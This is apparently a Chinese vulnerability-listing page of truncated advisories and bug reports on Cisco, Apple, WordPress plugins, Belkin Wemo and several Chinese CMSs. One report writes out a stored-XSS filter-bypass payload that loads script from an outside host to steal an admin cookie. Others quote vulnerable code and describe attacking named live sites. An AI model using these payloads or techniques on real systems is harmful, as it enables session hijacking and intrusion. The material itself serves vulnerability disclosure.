闪电博 Security Vulnerabilities

Sendy 'i' SQL注入漏洞

Bugtraq ID:65772 Sendy是一款自托管的电子邮件通讯应用。 应用对用户通过'i'提交的参数缺少充分过滤，允许攻击者利用漏洞进行SQL注入攻击，可获得敏感数据库信息或控制应用系统。 0 Sendy 1.1.8.4 目前没有详细解决方案提供：...

Cisco Unified IP Phone 7960G CTL信任链执行安全绕过漏洞

Bugtraq ID:65705 CVE ID:CVE-2014-0737 Cisco Unified IP Phone是思科的统一IP电话解决方案。 Cisco Unified IP Phone 7960G的CTL验证存在漏洞，允许未验证远程攻击者向IP电话注入CTL文件。由于不充分验证CTL文件，攻击者可向电话机中注入恶意CTL文件爱你，可使电话信任攻击者控制的系统。 0 Cisco Unified IP Phone 7960G 目前没有详细解决方案提供：...

WordPress Search Everything插件SQL注入漏洞

WordPress是一种使用PHP语言开发的博客平台，用户可以在支持PHP和MySQL数据库的服务器上架设自己的网志。 WordPress Search Everything插件index.php不正确过滤用户提交的"s"参数数据，允许远程攻击者利用漏洞提交特制的SQL请求，可操作或获取数据库数据。 0 WordPress Search Everything Plugin 7.0.2 WordPress Search Everything 7.0.3已经修复该漏洞，建议用户下载更新：...

Apple Mac OS X多个安全漏洞(APPLE-SA-2014-02-25-1)

BUGTRAQ ID: 65777 CVE(CAN) ID: CVE-2014-1254,CVE-2014-1262,CVE-2014-1255,CVE-2014-1256,CVE-2014-1257,CVE-2014-1258,CVE-2014-1261,CVE-2014-1263,CVE-2014-1265,CVE-2014-1259,CVE-2014-1264,CVE-2014-1260,CVE-2014-1246,CVE-2014-1247,CVE-2014-1248,CVE-2014-1249,CVE-2014-1250,CVE-2014-1245 OS X（前称Mac OS...

Cisco Adaptive Security Appliance TFTP配置请求竞争条件漏洞

CVE ID:CVE-2014-0739 Cisco Adaptive Security Appliance是一款自适应安全设备，可提供安全和VPN服务的模块。 Cisco Adaptive Security Appliance处理配置电话代理连接数据库的TFTP请求存在竞争条件错误，允许攻击者利用漏洞操作部分配置数据。 0 Cisco Adaptive Security Appliance (ASA) 9.1(3) Cisco ASA 5500-X Series Adaptive Security Appliances 目前没有详细解决方案提供：...

Apple多个产品SSL/TLS处理验证绕过漏洞

CVE ID:CVE-2014-1266 Apple iOS是一款运行在苹果iPhone和iPod touch设备上的最新的操作系统。Apple TV是苹果可以让PC和iPod中的相片，视频和音乐无线传输到电视之中高清晰度播出。Apple Mac OS X是一款苹果公司开发的操作系统。 Apple多个产品数据安全组件中安全传送特征中的SSLVerifySignedServerKeyExchange函数(libsecurity_ssl/lib/sslKeyExchange.c)存在安全漏洞，由于没有正确检查TLS Server Key...

WordPress Media File Renamer插件多个HTML注入漏洞

Bugtraq ID:65715 CVE ID:CVE-2014-2040 WordPress是一种使用PHP语言开发的博客平台，用户可以在支持PHP和MySQL数据库的服务器上架设自己的网志。 WordPress Media File Renamer插件多个脚本不正确过滤用户提交的数据，允许远程攻击者利用漏洞注入恶意脚本或HTML代码，当恶意数据被查看时，可获取敏感信息或劫持用户会话。 0 WordPress Media File Renamer V1.7.0 目前没有详细解决方案提供：...

WordPress DZS-VideoGallery ‘ajax.php’跨站脚本漏洞

Bugtraq ID:65526 WordPress是WordPress软件基金会的一套使用PHP语言开发的博客平台，该平台支持在PHP和MySQL的服务器上架设个人博客网站。DZS-VideoGallery是其中的一个DZS视频库插件。 WordPress DZS-VideoGallery插件中存在跨站脚本漏洞，该漏洞源于程序没有正确过滤用户提交的输入。当用户浏览被影响的网站时，其浏览器将执行攻击者提供的任意脚本代码，这可能导致攻击者窃取基于cookie的身份认证并发起其它攻击。 0 WordPress DZS-VideoGallery...

CNNVD Cross Site Scripting

...

Cisco Unified Communications Manager RTMT信息泄漏漏洞

Bugtraq ID:65642 CVE ID:CVE-2014-0732 Cisco Unified Communications Manager是一款Cisco IP电话解决方案中的呼叫处理组件。 访问某些RTMT WEB应用资源时Cisco Unified Communications Manager应用对其缺少正确的验证，允许远程攻击者利用漏洞获取受限文件敏感内容信息。 0 Cisco Unified Communications Manager 10.0(1.10000.3) 厂商补丁： Cisco Cisco Unified Communications Manager...

Cisco Unified Communications Manager IPMA跨站脚本漏洞

Bugtraq ID:65641 CVE ID:CVE-2014-0735 Cisco Unified Communications Manager是一款Cisco IP电话解决方案中的呼叫处理组件。 Cisco Unified Communications Manager处理相关IPMA的输入时缺少充分过滤，远程攻击者可以利用漏洞构建恶意URI，诱使用户解析，可获得敏感Cookie，劫持会话或在客户端上进行恶意操作。 0 Cisco Unified Communications Manager 10.0(1.10000.3) 厂商补丁： Cisco Cisco Unified...

Cisco Unified Communications Manager Java类文件信息泄漏漏洞

Bugtraq ID:65644 CVE ID:CVE-2014-0731 Cisco Unified Communications Manager是一款Cisco IP电话解决方案中的呼叫处理组件。 Cisco Unified Communications Manager管理接口不正确执行正确的验证，允许远程攻击者利用漏洞访问UCM管理接口中特定的URL，未授权访问部分Java类文件。 0 Cisco Unified Communications Manager 10.0(1.10000.3) 目前没有详细解决方案提供：...

Cisco Unified Communications Manager CAPF SQL注入漏洞

Bugtraq ID:65645 CVE ID:CVE-2014-0734 Cisco Unified Communications Manager是一款Cisco IP电话解决方案中的呼叫处理组件。 Cisco Unified Communications Manager证书授权代理功能(Certificate Authority Proxy Function)不正确过滤用户提交的输入，允许远程攻击者利用漏洞提交特制的SQL查询，可操作或获取数据库数据。 0 Cisco Unified Communications Manager 10.0(1.10000.3) 厂商补丁： Cisco.....

Cisco Unified SIP Phone 3905未授权访问漏洞

Bugtraq ID:65663 CVE ID:CVE-2014-0721 Cisco Unified SIP Phone 3905是一款价格经济的IP电话。 Cisco Unified SIP Phone 3905存在未文档化的测试接口，允许远程攻击者连接该接口获得对设备的root访问。 0 Cisco Unified SIP Phone 3905 厂商补丁： Cisco Cisco Unified SIP Phone 3905固件版本9.4(1)已经修复该漏洞，建议用户下载更新：...

程氏舞曲CMS最新版存储型XSS（已劫持到官网管理员）

简要描述： 通过最新版存储型XSS，已成功劫持到管理员cookie，并成功登录到官方演示站后台 P.S.管理员用的电脑是：土豪MAC！ 详细说明： 在会员中心-设置-昵称修改，发现已经过滤了<script>，但是发现只过滤了一层，于是将<script>写成<scr<>ipt>，保存后发现xss成功了 于是X入了这条语句，Jim叔叔<scr<>ipt src=http://126.am/SlQop0></sc<>ript>，发现文本框有长度限制，但是只是前台的一个限制，修改了一下html提交保存成功...

Cisco Unified Communications Manager ELM信息泄漏漏洞

Bugtraq ID:65643 CVE ID:CVE-2014-0733 Cisco Unified Communications Manager是一款Cisco IP电话解决方案中的呼叫处理组件。 访问某些相关ELM的URL时Cisco Unified Communications Manager应用对其缺少正确的验证，允许远程攻击者利用漏洞获取受限文件敏感内容信息。 0 Cisco Unified Communications Manager 10.0(1.10000.3) 厂商补丁： Cisco Cisco Unified Communications Manager...

Cisco Unified Communications Manager跨站请求伪造漏洞

Bugtraq ID:65640 CVE ID:CVE-2014-0736 Cisco Unified Communications Manager是一款Cisco IP电话解决方案中的呼叫处理组件。 Cisco Unified Communications Manager存在跨站请求伪造漏洞，允许远程攻击者构建恶意URI，诱使用户解析，可以目标用户上下文执行恶意操作，如在CDR分析和报告页面上执行未授权操作。 0 Cisco Unified Communications Manager 10.0(1.10000.3) 厂商补丁： Cisco Cisco Unified...

Belkin Wemo Home Automation硬编码密钥漏洞

BUGTRAQ ID: 65624 CVE(CAN) ID: CVE-2013-6952 Belkin Wemo Home Automation devices 是家电远程控制系列产品。 Belkin Wemo Home Automation固件包含硬编码的密钥和口令，可被远程攻击者利用为恶意固件进行签名。 0 Belkin Wemo Home Automation 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：...

Belkin Wemo Home Automation 'peerAddresses' API XML外部实体注入漏洞

BUGTRAQ ID: 65623 CVE(CAN) ID: CVE-2013-6948 Belkin Wemo Home Automation devices 是家电远程控制系列产品。 Belkin Wemo Home Automation API服务器存在XML注入漏洞，通过XML注入可攻击peerAddresses API，从而泄露系统文件的内容。 0 Belkin Wemo Home Automation 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：...

Belkin Wemo Home Automation Devices远程安全限制绕过漏洞

BUGTRAQ ID: 65632 CVE(CAN) ID: CVE-2013-6949 Belkin Wemo Home Automation devices 是家电远程控制系列产品。 Belkin Wemo Home Automation设备使用 STUN & TURN 协议，该漏洞让控制了一个Wemo设备的攻击者可用 STUN & TURN 协议中继连接到其他的Wemo设备。 0 Belkin Wemo Home Automation 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：...

Apple Mac OS X及iOS 'IOReportHub'组件本地拒绝服务漏洞

BUGTRAQ ID: 65619 OS X（前称Mac OS X）是苹果公司为麦金塔电脑开发的专属操作系统的最新版本。 Apple Mac OS X及iOS在实现上存在本地拒绝服务漏洞，本地攻击者可利用此漏洞造成应用崩溃。 0 Apple Mac OS X 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：...

Belkin Wemo Home Automation Devices远程代码执行漏洞

BUGTRAQ ID: 65633 CVE(CAN) ID: CVE-2013-6951 Belkin Wemo Home Automation devices 是家电远程控制系列产品。 Belkin Wemo Home Automation设备没有本地的证书库来验证SSL连接的完整性，攻击者可利用此漏洞在受影响应用上下文中执行任意代码。 0 Belkin Wemo Home Automation 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：...

Belkin Wemo Home Automation中间人信息泄露漏洞

BUGTRAQ ID: 65631 CVE(CAN) ID: CVE-2013-6950 Belkin Wemo Home Automation devices 是家电远程控制系列产品。 Belkin Wemo Home Automation固件的分发过程没有使用SSL加密，用明文传输敏感信息，在实现上存在信息泄露漏洞，攻击者可利用此漏洞获取敏感信息。 0 Belkin Wemo Home Automation 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：...

Serendipity跨站脚本漏洞和SQL注入漏洞

BUGTRAQ ID: 65449 Serendipity是Serendipity团队开发的一套基于PHP的博客系统。该系统支持创建在线日记、博客、网页等。 Serendipity中存在跨站脚本漏洞和SQL注入漏洞。攻击者可利用这些漏洞窃取基于cookie的身份认证，控制应用程序，访问或修改数据，或利用底层数据库中潜在的漏洞。Serendipity 1.7.5版本中存在漏洞，其他版本也可能受到影响。 0 Serendipity 1.7.5 厂商补丁： Serendipity 目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接： ...

Wordpress Buddypress插件'name'字段HTML注入漏洞

Bugtraq ID:65555 CVE ID:CVE-2014-1888 WordPress是一种使用PHP语言开发的博客平台，用户可以在支持PHP和MySQL数据库的服务器上架设自己的网志。 Wordpress plugin Buddypress插件不正确过滤'name'字段数据，允许远程攻击者利用漏洞注入恶意脚本或HTML代码，当恶意数据被查看时，可获取敏感信息或劫持用户会话。 0 Wordpress plugin Buddypress <= 1.9.1 厂商补丁： Wordpress Wordpress plugin Buddypress...

BIWEB商城版XSS盲打cookie

简要描述： 某处存储型xss可盲打管理cookie 详细说明： message\include\index.inc.php 文件26-36行（不止这一处） if ($_SERVER["REQUEST_METHOD"] == "POST"){ if(empty($_POST['contact'])) check::AlertExit('对不起，姓名必须填写!',-1); if(empty($_POST['tel'])) check::AlertExit('对不起，联系电话必须填写!',-1); if(empty($_POST['email']))...

开源微博EasyTalk任意用户密码修改

简要描述： 开源微博系统EasyTalk任意用户密码修改,包括管理员 而且不用登陆,非常强大... （其实只是一个小小的设计缺陷）:-) 详细说明： 1 CMS介绍 EasyTalk是国内首款多用户PHP+Mysql开源微博系统，支持网页、手机Wap、手机短信、QQ、Gtalk、飞信等多种方式发表或接收信息，EasyTalk全面符合国人的上网习惯，真正轻量级架构，使得使用者上手容易，管理者安装部署容易、管理便捷。EasyTalk功能强大，便捷的插件系统，可二次开发性高，人性化的模板自定义功能大幅提高了用户的体验，因此EasyTalk相比国内其他微博系统有绝对的优势！ 2 漏洞分析...

jDisk (stickto) v2.0.3 iOS多个漏洞

jDisk将你的iPhone/iPad/iPod变成一个闪存驱动器/盘。 jDisk存在多个漏洞，攻击者可以利用漏洞遍历目录，包含本地文件，或执行任意代码。 0 jDisk (stickto) v2.0.3 iOS 目前厂商暂无提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：...

EasyTalk开源微博系统SQL注入

简要描述： 搞开发的，把产品自身安全做好才是王道，而不是借助某些所谓的安全产品来帮助防御！ 详细说明： Location: Home/Lib/Action/SpaceAction.class.php 代码片段 //profile 获得用户 public function getuser() { if ($this->my['user_name']==$_GET['user_name']) { $user=$this->my; } else { ...

Schneider Electric SCADAPack VxWorks Debugger漏洞

施耐德电气集团对能源和基础设施、工业、数据中心和网络、楼宇以及住宅等领域提供产品和服务。 Schneider Electric SCADAPack 330, 334, 350, 357产品由于启用了VxWorks调试代理存在安全漏洞，远程攻击者通过发送特制的请求到UDP端口17185，利用此漏洞可控制受影响设备。 0 Schneider Electric SCADAPack 35x Schneider Electric SCADAPack 33x 厂商补丁： Schneider Electric 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：...

EasyTalk 官网疑似被入侵及原因分析

简要描述： 官网被入侵 详细说明： 有于微博漏洞造成官网被入侵。 出现问题在这 ``` public function index() { parent::tologin(); $appname=trim($this->_get('appname')); $action=$this->_get('action');//直接调用方法 $out=urldecode($_GET['out']); //未过滤，直接提交。 ...

EasyTalk存储型XSS

简要描述： escape的逻辑似乎有点问题？ 详细说明： 就测试了两处，一个是电子邮箱另一个是个人介绍。 第一处： PS:这个验证邮箱合法性的函数，是不是也写得有点问题呢？ 第二处： 在用户注册成功后，如果对上述资料进行修改，会先将数据转成HTML实体再输出。 但是在注册过程当中，似乎并没有对这些数据进行escape(转成HTML实体)，导致可植入恶意代码 F12看了一下也没有Http only标示，盗取cookie应该不是什么问题了。 漏洞证明：...

Serendipity 1.7.5多个漏洞

Serendipity是Serendipity团队开发的一套基于PHP的博客系统。该系统支持创建在线日记、博客、网页等。 Serendipity存在多个输入验证漏洞，攻击者可以利用漏洞获得用户敏感信息或服务器主机控制权限。 0 Serendipity 1.7.5 厂商补丁： Serendipity Serendipity 1.7.7版本以修复此漏洞，建议用户下载使用：...

InMobi Ad SDK javaScript绑定不安全WebView内容加载漏洞

InMobi Ad SDK是一款广告软件开发包。 InMobi Ad SDK不正确使用JavaScript绑定并通过HTTP来加载WebView内容，允许可通过中间人攻击的攻击者调用某些Java方法，如应用程序使用的SDK拥有'CALL_PHONE'权限的话，可未经用户同意调用任意电话号码。 0 InMobi Ad SDK 3.6.2 InMobi Ad SDK 4.0.2 InMobi Ad SDK 4.0.3已经修复该漏洞，建议用户下载更新：...

金蝶云之家博客任意用户密码重置

简要描述： 详细说明： 地址： http://kdweibo.com/home 依次点击： 登陆-->忘记登陆密码 然后登陆邮箱查看重置链接是否存在缺陷 上图中可看到，请求链接存在u和t的参数： 尝试数次后可观察到，u是固定不变的，大概是userName相关的串，而t是有规律的递增。 紧接着尝试重置密码的操作，发现u这个参数是无用的，post请求只发送一个t参数和表单中的新密码，如下图： 好了，现在我们开始研究这个t参数。在找回密码的第一个页面，连续数次提交我的邮箱地址，获取到5个重置密码的链接，把他们列在下面观察一下： 可以看出，t参数只有5-8位...

ThinkSNS某功能平行权限4

简要描述： 看到厂商迟迟不确认，所以再来一发，难不成厂商已经放假了？如果是开年求收留！ 详细说明： 问题发生在 wap模块 apps/wap/Lib/Action/IndexAction.class.php 和 apps/w3g/Lib/Action/IndexAction.class.php 行665 ``` public function doDelete() { $weibo_id = intval($_GET['weibo_id']); if ($weibo_id <= 0) { ...

ThinkSNS某功能平行权限2

简要描述： ThinkSNS某功能多处平行权限 详细说明： 继续平行权限 还是刚才的文件 本打算补充一下的 结果已经过了审核了！所以就在提交一个！ 问题发生在微吧模块 代码apps\weiba\index.action.php 行652 ``` /* * 删除帖子 * @return void / public function postDel(){ $weibaid =...

齐博CMS存储型XSS可getshell（组合利用）

简要描述： 齐博cms,利用威胁不大的前台存储型xss+没有任何危害的后台CSRF+几乎无影响可忽略的后台getshell 3个0day 结合起来的威力拿下齐博cms,虽然不算什么严重的漏洞,但是中途遇到的问题和突破还是聊以慰藉的,还请各位看官轻轻拍砖. ——by pandas 详细说明： 前一段时间西毒爆出qibocms 0day的时候...

齐博CMS储存型xss跨站漏洞可打任意用户

简要描述： 齐博CMSV7 及齐博新闻系统 详细说明： 齐博CMSV7 版 站内短信+发布文章处存在储存型xss跨站漏洞 写短信 上传一张图片--查看源代码 如图1 可以看到图片地址 在图片地址后面加入测试代码 如图2 发送即可 当收件者查看内容时触发代码 文章投稿处和此处利用方法一样 漏洞证明： 齐博CMSV7 版 站内短信+发布文章处存在储存型xss跨站漏洞 写短信 上传一张图片--查看源代码 如图1 可以看到图片地址 在图片地址后面加入测试代码 如图2 发送即可...

ThinkSNS某功能平行权限漏洞

简要描述： ThinkSNS某功能平行权限 详细说明： 问题发生在微吧模块 代码apps\weiba\index.action.php public function postEdit() 这个方法有判断权限 不过到了代码 行561这里并没有判断被编辑的帖子是否是当前用户发的！ ``` public function doPostEdit(){ $weiba = D('weiba_post')->where('post_id='.intval($_POST['post_id']))->field('weiba_id,attach')->find(); if...

Movable Type Rich Text Editor脚本注入漏洞

Movable Type是一款基于WEB的网络博客系统。 由于通过网页键入的输入在富文本编辑器显示之前缺少过滤。在恶意数据被查看时，攻击者可以利用漏洞在受影响站点上下文的用户浏览器会话中执行任意HTML和脚本代码。 下列产品和版本存在漏洞： Movable Type Pro version 6.0 Movable Type Pro versions 5.2.x, 5.1x, and 5.0x Movable Type Open Source (MTOS) versions 5.2.x, 5.1x, and 5.0x Movable Type Advanced / Movable Type.....

信游科技页游平台程序通用型SQL注入漏洞

简要描述： 某页游平台通用型SQL注入漏洞，可直接提权服务器，涉及页游平台数十个。全是企业站点，涉及资金交易。 详细说明： 今天是我第一次用sqlmap，没钱买电脑，也装不了backtrack 存在漏洞站点：http://www.52xinyou.cn/anli.htm 都在这个客户案例里面，17188不存在这个页面的漏洞。但是我不保证其他页面不存在。 本次渗透测试站点：http://www.teiyi.com/，对不起，让你受苦了。 sql注入地址：http://www.teiyi.com/payment/yee_mobile.aspx?code=UNICOM 充值页面 ...

CSDjcms_php3.0多处csrf漏洞

简要描述： csrf 详细说明： 最新版本并不是3.0，但是下载最多的却是3.0，所以我选择测试3.0 如果xss配合这些csrf使用，效果肯定杠杠的，我也有3.0的xss漏洞，如果厂商忽略了我就留着自己用吧，这句话不是威胁，很平淡的一句话，大家都不要想多，既然你都认为不重要了，我何必还发出来呢？对吧？ 废话不多说了 下面的csrf都是可以操控别人做任意事的 ============================csdjcms多处csrf====================== 可以任意让任何人关注我 点击进入一个人的主页里面，这里先进入Mosuan的主页 打开神器burp...

Ecmall 2.3 File Inclusion Vulnerability（鸡肋）

简要描述： Ecmall 2.3 File Inclusion Vulnerability 详细说明： Ecmall 2.3 File Inclusion Vulnerability By：zcy Team：网络尖刀 版本：2.3 漏洞文件：app\my_payment.app.php ECMall 社区电子商务系统(简称ECMall)是上海商派网络科技有限公司继ECShop之后推出的又一个电子商务姊妹产品。与 ECShop 不同的是，ECMall 是一个允许店铺加盟的多店系统。现已停止更新。 漏洞文件存在app/my_payment.app.php中的install方法中第74—88行中....

Ecmall SQL注射之一

简要描述： 之前给公司提交过ecmall的一个漏洞合集，然后公司助理特地打shopex的400电话问要不要漏洞详情，结果却被无情地告知等他们想知道的时候再来询问漏洞详情。 Shopex对待安全就是这种态度么？ 在此发一个新的注射，之前提交给我司的那些漏洞这里就先不发了，shopex你知道该怎么做的。 详细说明： 缺陷文件：/app/coupon.app.php ``` function extend() { $coupon_id = isset($_GET['id']) ? trim($_GET['id']) : ''; if (empty($coupon_id)) ...

BlogEngine.NET 'sioc.axd'信息泄露漏洞

BUGTRAQ ID: 64635 CVE(CAN) ID: CVE-2013-6953 BlogEngine.NET是轻量级ASP.NET博客平台。 BlogEngine.NET 2.8.0.0及更早版本在实现上存在信息泄露漏洞，这可使未经身份验证的用户查看BlogEngine.net站点的用户名和哈希密码。 0 BlogEngine.NET BlogEngine.NET 2.0 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：...

汇文图书馆管理系统致使数十所高校学生信息可泄露

简要描述： 目前汇文软件图书管理系统由于丰富的功能和优良的用户体验被越来越多的高校图书馆采用，但是经测试发现了一个设计疏忽的漏洞而导致高校师生的信息泄露。 详细说明： 猜测是由于高校方面出于方便的考虑，图书馆个人管理系统用户名与密码均初始化为学号，这就给别人留下了可乘之机：因为师生很少会主动的去更改图书馆管理系统的密码，由于学号的连续性，因此只要找到了学校的学号构建规则（或者直接去谷歌一个对应学校的学号）就可以推而广之获取全校师生的图书馆管理系统的用户名密码（均为学号），使用脚本就可以批量化的进行畅通无阻的登录并获取众多师生的信息（安全意识高，自觉修改密码的除外）。...

Advanced Dewplayer Plugin for WordPress 'download-file.php'脚本目录遍历漏洞

Bugtraq ID:64587 CVE ID:CVE-2013-7240 WordPress是一种使用PHP语言开发的博客平台，用户可以在支持PHP和MySQL数据库的服务器上架设自己的网志。 WordPress Advanced Dewplayer插件不正确限制对wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php脚本的访问，允许攻击者利用漏洞通过目录遍历序列读取任意文件。 0 WordPress Advanced Dewplayer Plugin 1.x 目前没有详细解决方案提供：...

Microsoft Windows Movie Maker '.wav'文件拒绝服务漏洞

Bugtraq ID:61334 CVE ID:CVE-2013-4858 Microsoft Windows Movie Maker是一款简易非线性编辑软件。可以制作、编辑及分享家庭影片，并新增特殊效果、音乐及旁白，然后通过网络、电子邮件或CD分享您制作的电影。 Windows XP SP3上的Microsoft Windows Movie Maker不正确处理.wav文件，允许远程攻击者利用漏洞构建恶意文件，诱使用户解析，可使应用程序崩溃。 0 Microsoft Windows Movie Maker 2.1.4026 目前没有详细解决方案提供：...

MetInfo 5.1 uploadfile_save.php 后门漏洞

0x01 漏洞概述 MetInfo企业网站管理系统采用PHP+Mysql架构，全站内置了SEO搜索引擎优化机制，支持用户自定义界面语言(全球各种语言)，拥有企业网站常用的模块功能（企业简介模块、新闻模块、产品模块、下载模块、图片模块、招聘模块、在线留言、反馈系统、在线交流、友情链接、网站地图、会员与权限管理）。强大灵活的后台管理功能、静态页面生成功能、个性化模块添加功能、不同栏目自定义FLASH样式功能等可为企业打造出大气漂亮且具有营销力的精品网站。 官方网站：http://www.metinfo.cn/ 影响版本：5.1 ZoomEye Dork：app:"MetInfo" ...